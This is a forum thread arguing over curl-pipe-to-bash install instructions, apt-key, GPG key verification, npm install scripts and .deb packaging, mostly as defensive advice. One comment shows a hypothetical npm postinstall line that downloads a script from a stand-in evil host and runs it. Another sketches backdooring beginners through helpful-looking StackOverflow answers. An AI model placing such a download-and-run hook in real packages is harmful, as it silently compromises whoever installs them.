I hate this practice; I have no idea how it became commonplace. Of course, installation procedures can often be long and tedious, but it only takes one popular project's script server being compromised for tons of people to suddenly be running malicious commands.
I would rather manually install dependencies, set up my system, add repos, etc. than run some script, any day. But then again some projects wouldn't be that popular if they were hard to install.
Some of npm's installation instructions ask you to pipe curl into bash, to run a lovely script [0] which makes things easier for you, but not by much. Is it really necessary? Would developers give up trying to get npm and node just because installing isn't as easy as "curl https://some.script.com/that-script.sh | sudo -E bash -; sudo apt-get install npm"?
Other than building/installing programs, adding GPG/SSH keys as in the blog post can be just as dangerous, and while it's not simple, there could be some method built to make things easier without having to run commands you never even check.
Anyway, I hope projects grow out of this habit.
[0] https://deb.nodesource.com/setup_6.x
Look at it this way: whenever you are running a program you didn't write yourself, you're running a bunch of commands you never checked. This is no different to, say, downloading a precompiled executable and running it, with all the same problems and tradeoffs.
It is different. While it is obviously true that I haven't checked all of the binaries I'm running, I at least can, through the various signatures involved, rely on the fact that it was created by a particular individual or group, whom I may trust.
Would you really assign the same level of trust to, e.g., a sudo(8) binary downloaded from somewhere on the internet as you would to the one provided by your distribution?
That's not the comparison being made. It's between piping curl to bash and just downloading a script and running it with sudo, without inspecting it.
Yes, you "could inspect". But this is about the instructions. And instructions to pipe curl to bash are no more or less harmful than instructions to download a binary from a "random" server and run it verbatim.
"Piping curl to bash" is a red herring. It's "running unverified code" that's the problem. Piping curl to bash just makes it viscerally obvious how dangerous that is.
There are various levels of trust, of course. The packages in Debian or RedHat are more trustworthy (there is a process) than those in NPM or Maven (free-for-all, even if you have some assurance that the package you're downloading is the very same the developer uploaded).
But installing a random NPM package is no more dangerous than curl-piping a script from Github to bash over HTTPS (without -k). You're still sure that what you're downloading and running is what whoever is in control of that repo intended.
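To make that concrete: any npm package can run arbitrary commands at install time via its lifecycle scripts (the package name and URL below are made up):

```sh
# nothing stops a registry package from shipping e.g.
#   "scripts": { "postinstall": "curl -s https://evil.example.com/x.sh | sh" }
# in its package.json; that script runs with your privileges the moment you do:
npm install some-random-package

# you can opt out per install, but hardly anybody does:
npm install --ignore-scripts some-random-package
```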
What IS more dangerous is training a generation of developers to solve problems by quickly copy-pasting random strangers' magic incantations from random blogs or Stackoverflow into their terminals. You could probably infect a large number of machines very quickly by stalking certain categories on Stackoverflow for "noob" questions and giving a good answer in the form of a GitHub gist curl-pipe to sudo that fixes the problem, but that also discreetly backdoors the target.
People are lazy, developers are people, and most developers are not interested in the process of system maintenance, so if something can be done fast and easily, they couldn't care less about the details. My colleague still uses the Windows 8 that came preinstalled on his laptop five years ago; it's slow as hell and riddled with all kinds of toolbars, but he doesn't want to make the effort of a full reinstall. He would happily pipe curl to bash; actually, I'm not even sure he understands what curl or bash is. He knows some Java and JavaScript, and that's enough to get paid.
I like tinkering with systems; I've reinstalled my home server maybe 20 times, and I always reinstall macOS from scratch when a new version is released. But honestly that's not very productive time spent, so I understand people who just want to get things done.
I think it's a failure of current operating systems: installing software is still too hard and tedious. Opening a terminal and copy-pasting strings is not a trivial activity. If one could install npm by pushing a button on its website, people would do that instead.
This very much includes the upsurge in containerization and the quagmire that is Linux distro package dependencies.
First of all, containerization allows for static linking via other means. Since the container holds everything a program needs to run, in exactly the right versions, it produces what is practically the same as a static binary with the linked libs compiled in.
Similarly, package dependencies are a quagmire because package A may want lib B, while C wants B+1. And B+1 introduces some subtle (or overt) change that makes it unsuitable for A. This then results in a game of telephone with package and file names to try to get both B and B+1 to exist on a system at the same time. But there is no real convention for how to settle these conflicts, so each distro has its own rules and procedures.
But really the distros are trying to make the best of a bad situation brought on by lib and program developer laziness. Laziness whereby they do not properly check breakages before shipping, or simply grab the latest and shiniest that gets their job done rather than track down the lowest common denominator that is suitable.
It may be used, by developers, as an argument for containers. But that is just the same old lazy devs being their same old lazy selves. Containers are not fixing the underlying problem.
I very much like this formalism for describing installation procedures. Being curious and informed about the risks, I will not copy-paste curl ... | sudo .... I will curl to a temporary file, review the file, and if there is nothing fishy, I will copy the commands (from the file, not a browser) into a terminal.
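In practice it looks something like this (the URL is just a placeholder, and sudo only comes into play if the reviewed commands actually need it):

```sh
# fetch the installer to a file instead of piping it straight into bash
curl -fsSL https://example.com/install.sh -o /tmp/install.sh

# read it; bail out if anything looks fishy
less /tmp/install.sh

# only after reviewing it, run the reviewed copy
# (or copy individual commands out of it into the terminal)
bash /tmp/install.sh
```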
If the content of the file is a very messy (or overly long) script, I take it that the software will also be messy and does not deserve my time.
This formalism flatters my ego, proves transparency, and saves me time. Full benefit. It is dangerous for noobs, but it's also a good opportunity to educate them.
> But then again some projects wouldn't be that popular if they were hard to install.
Slackware was my first distro back in 2007, and I still wish it had at the very least a decent installer and package manager. It is so well built, but upgrading and installing are just not as trivial as on Debian. I guess openSUSE (afaik) is the only remnant of Slackware that's usable - I really loved openSUSE, but just like with every other distro in the world, I have to dance to get my Wi-Fi working properly.
I've wasted several days trying to get programs I write turned into debs and rpms, I gave up. It's a single executable you can download and put wherever you like, or download the source and './configure.py; make'.
Also, I release new versions regularly, so being in the official repositories is no good, as the packages there will get out of date; I would have to run my own repositories for several versions of Ubuntu and Red Hat. No chance.
I have succeeded in turning my programs into DEBs and RPMs that also properly comply with all the distribution packaging guidelines, but it took me two months. I am now onboarding two other developers but they are struggling with making changes to DEBs and RPMs. All because of the complexity, archaic toolchain and poor documentation.
The only reason we made DEBs and RPMs was to please users, but it's not an experience I would recommend to anyone.
> I've wasted several days trying to get programs I write turned into debs and rpms, I gave up.
The formats themselves are pretty easy to create; for a .deb you just:
- Make the folder hierarchy you want to include, e.g. things like `myBuildFolder/usr/bin/myProgram`
- (`dpkg-deb` itself adds the `debian-binary` member containing `2.0`, so you don't need to create that file)
- Make a `myBuildFolder/DEBIAN/control` file which contains e.g. the name of the package and its dependencies
- Run `dpkg-deb --build myBuildFolder`
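Put together, it's roughly this sketch (package name, version and control fields are just placeholders):

```sh
# stage the files exactly where they should land on the target system
mkdir -p myBuildFolder/usr/bin
install -m 0755 myProgram myBuildFolder/usr/bin/myProgram

# minimal control file: name, version, architecture, maintainer, description
mkdir -p myBuildFolder/DEBIAN
cat > myBuildFolder/DEBIAN/control <<'EOF'
Package: myprogram
Version: 1.0-1
Architecture: amd64
Maintainer: Some Body <somebody@example.com>
Description: Example single-binary package
EOF

# build the .deb and install it
dpkg-deb --build myBuildFolder myprogram_1.0-1_amd64.deb
sudo dpkg -i myprogram_1.0-1_amd64.deb
```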
This gives a .deb package which will be tracked by dpkg/apt, allowing clean removals/upgrades/etc. unlike `sudo make install` which will spray cruft all over the system. When I used Debian, I would install all software like this.
I've never made a .deb that's compliant with Debian's packaging policies though, since that does take a lot of effort.
Your example fetches the key from the keyserver without https. Fetching the key from the project's own site over https using curl is better.
Edited to add: Fetching from a keyserver is OKish if a) you use the long form of key id and b) your gpg is new enough that it checks that it got the key for the id it requested. Still, the Web page you copy the key id from is as vulnerable to an attack on the server as the server serving the key directly.
Right, sorry, it should use hkps as the protocol and leave out the port.
Especially when copying and pasting things anyway, the long form should always be preferred. I think there was an article on here several months ago on the dangers of using abbreviated fingerprints.
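Something like this, with the full fingerprint rather than a short ID (the keyserver and fingerprint here are placeholders, not any project's real values):

```sh
# fetch over hkps and refer to the key by its full 40-character fingerprint
gpg --keyserver hkps://keyserver.example.org \
    --recv-keys 0123456789ABCDEF0123456789ABCDEF01234567

# double-check what actually landed in the keyring
gpg --fingerprint 0123456789ABCDEF0123456789ABCDEF01234567
```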
Manipulation of the fingerprint on the web page might be spotted by checking the archive.org Wayback Machine, which probably doesn't index the keyfile itself. That doesn't prevent manipulation, but it can make it easier to detect if you're suspicious.
hkp literally stands for HTTP keyserver protocol. Does your corporate proxy really mess up HTTP connections?
Why does it matter how apt-key is implemented? Its purpose is key management, and whether it uses bash for the job or perl or C is completely irrelevant. It's been in use for over a decade. Do you have any reason to suspect deficiencies in it just because it uses shell scripts?
> Consider the case where download.docker.com starts serving an evil key file
At that point I can't trust the key ID in the Docker documentation either. Since Docker doesn't use the web of trust (who does, honestly?), there is no way I can independently verify the key ID in the provided key file. So I don't see what good inspecting the key file before adding it to the apt keyring does.
On piping anything from the Internet directly to your system for execution: Don't be lazy. Don't be an ass.
When I am working in a persona that is responsible for managing a server or a service, I insist on knowing everything I need to know about how to keep that service, and the environment in which it operates, safe, alive, and providing usable performance.
I require good, clean and coherent instructions for deploying something at production level, where all required components and their preferred method of interaction are clearly explained and documented by the developer, and can be repeated in a predictable manner by me.
If all I have to work with is "pipe this to the shell, alternatively read the code" I'm going to go with "nah, I'll find something professional".
Time spent installing a system should be only a minuscule fraction of time spent actually operating the system. Spending a few extra hours doing it right shouldn't make a difference.
Actually, ideally GPG public keys would be small enough that they could be inlined in the script. Why is it that an SSH public key fits on a single line but a GPG key has to be a page-full?
A GPG public key does not consist only of the integer that forms the cryptographic public key; usually you also have multiple user IDs so others can recognize to whom the key belongs. To prove that these user IDs belong to this public key, each of them is signed. Obviously, that takes a few more bytes for the additional data and signatures.
The exported file size also depends on the way you export the GPG public key. By default, you will also export all signatures made by others, but you can use `gpg --export --export-options=export-minimal` to strip everything except the last self-signature on each user ID.
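You can see the difference for yourself (KEYID is a placeholder for any key in your keyring):

```sh
# full export, including third-party signatures
gpg --export --armor KEYID | wc -c

# minimal export: key material, user IDs, and only the latest self-signature on each
gpg --export --armor --export-options export-minimal KEYID | wc -c
```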
Thinking about this, I came up with the following. I tried getting the fingerprint in full but only got the short version. Not being a gpg ninja, I figure it would suffice to make an offline version of the add command.
... and then you have to check the fingerprints manually, and delete the ones you don't want manually.
No, what would really solve this specific issue is allowing apt-key to add only a single key, and to be given the expected fingerprint for it (as zimbatm explains).
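In the meantime you can approximate that by hand; a sketch with a placeholder URL, assuming a GnuPG new enough to have --show-keys (2.1.23+):

```sh
# download the key to a file instead of piping it anywhere
curl -fsSL https://download.example.com/project.gpg -o /tmp/project.gpg

# print the full fingerprint(s) of the key(s) in the file without importing them
gpg --show-keys --with-fingerprint /tmp/project.gpg

# compare against the fingerprint published out-of-band; only if it matches:
sudo apt-key add /tmp/project.gpg
```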
> providing instructions on adding the key to apt-key
curl ... | sudo apt-key add -  # that works
No really, they shouldn't tell you how to add the key to your store. If you don't know how to do that yourself, you shouldn't be admin/superuser. (Also, `man`)
Apt-key should just have a built-in way of importing keys from HTTP(s) URLs, preferably in interactive mode so you can confirm the keys are legitimate before adding them.
Among my first steps into the world of Linux this year, this sort of procedure has been one of the most glaringly disturbing things. Another, similar one was packages being downloaded over HTTP.
Debian packages are verified against signed repository metadata, so they are safe to transmit over HTTP. See https://wiki.debian.org/SecureApt (which appears to have been written around the time of the transition, so it's out of date; e.g. SHA1 signatures are no longer trusted, etc.).
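You can poke at this yourself on a Debian/Ubuntu box (the paths below are the usual defaults):

```sh
# the archive signing keys apt currently trusts
apt-key list

# the signed Release/InRelease metadata apt verified on the last update;
# each downloaded .deb is checked against the hashes listed there
ls /var/lib/apt/lists/ | grep -i release
```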